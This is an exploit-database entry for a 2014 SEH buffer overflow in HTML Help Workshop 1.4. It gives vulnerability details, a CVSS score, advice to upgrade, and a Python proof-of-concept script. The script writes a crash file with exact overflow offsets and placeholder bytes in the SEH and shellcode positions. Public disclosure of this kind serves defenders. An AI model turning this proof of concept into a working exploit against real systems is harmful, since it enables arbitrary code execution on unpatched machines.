HTML Help Workshop - (SEH) Buffer Overflow

vendor:

HTML Help Workshop

by:

Moroccan Kingdom (MKD)

9,3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: HTML Help Workshop

Affected Version From: 1.4

Affected Version To: 1.4

Patch Exists: YES

Related CWE: N/A

CPE: a:microsoft:html_help_workshop

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3/SP2 | Windows 7 64/32-bit (eng)

2014

HTML Help Workshop – (SEH) Buffer Overflow

HTML Help Workshop is prone to a buffer overflow vulnerability when handling specially crafted input. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. This vulnerability affects HTML Help Workshop version 1.4.

Mitigation:

Upgrade to the latest version of HTML Help Workshop.

Source

Exploit-DB raw data:

#----------------------------------------------------------------------------------------------------#
# Exploit Title: HTML Help Workshop - (SEH) Buffer Overflow                                          #
# Date: August 24 2014                                                                               #
# Exploit Author: Moroccan Kingdom (MKD)                                                             #
# Software Link: http://msdn.microsoft.com/en-us/library/windows/desktop/ms669985%28v=vs.85%29.aspx  #                                     #
# Version: 1.4                                                                                       #
# Tested on: Windows XP SP3/SP2 | Windows 7 64/32-bit  (eng)                                         #
#----------------------------------------------------------------------------------------------------#

import subprocess,time
import sys,os

if os.name == "nt" :
   subprocess.call('cls', shell=True)
   os.system("color c")
else :
   subprocess.call('clear', shell=True)

time.sleep(1)

print '''
///////////////////////////////////////////////////////////////////////////////
/                               M.O.R.O.C.C.A.N                               /
/                                K.I.N.G.D.O.M                                /
/                                    [MKD]                                    /
/ CONTACT US : facebook.com/moroccankingdom024 | twitter.com/moroccankingdom  /
/ To run this exploit Go to DOS and then go to the folder path program and    /
/ run this command : hc | exm : hcc.exe AAAABBBCCCSSS...           /
/////////////////////////////////////////////////////////////////////////////// '''

JNK = "A" * 284
NEH = "B" * 4                   
SEH = "C" * 4                
SHL = "S" * 400

POC = JNK + NEH + SEH + SHL

try :
   file = open("poc.txt", "w")
   file.write(POC)
   file.close()
   print "\n[*] file created successfully"
except:
   print "[#] error to create file"
 
close = raw_input("\n[!] press any button to close()")